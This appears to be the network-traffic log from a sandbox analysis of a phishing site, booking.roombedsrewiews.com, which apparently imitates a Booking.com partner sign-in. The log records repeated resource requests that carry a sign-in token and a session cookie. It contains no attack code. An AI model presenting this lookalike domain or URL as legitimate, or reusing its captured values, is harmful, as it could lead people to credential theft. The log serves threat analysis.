                Source: global trafficHTTP traffic detected: GET /static/OtAutoBlock.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/lazysizes.min.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /themes/custom/booking/fonts/icons/icons.woff?v=1.3.3 HTTP/1.1Host: partner.booking.comConnection: keep-aliveOrigin: https://booking.roombedsrewiews.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/45_1975cbc2f7eaad75f590.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/938_afde72b9aaa8302ff017.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/826_0d1737e180931a217647.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/css_399BM-E_9aHp94scPSljMDjXwz84BMBa3y-GIQG8XYY.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/css_3iFMQAIstg4teIom2wVaOik81XAQ5V-7tH-iz2mq5to.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/evergage.min.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/otSDKStub.js/consent/5b5ab62b-24f1-40fe-8bb1-6de0b3a94fda/5b5ab62b-24f1-40fe-8bb1-6de0b3a94fda.json HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/css_399BM-E_9aHp94scPSljMDjXwz84BMBa3y-GIQG8XYY.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/message_alert.svg HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/message_tip.svg HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/css_3iFMQAIstg4teIom2wVaOik81XAQ5V-7tH-iz2mq5to.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/a HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/message_alert.svg HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/message_tip.svg HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/ls.unveilhooks.min.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/71cd12cdf77ebcb750cff91a9bba6f04.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://booking.roombedsrewiews.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset_332_350x180px.png.png HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/optimize.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/munchkin.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
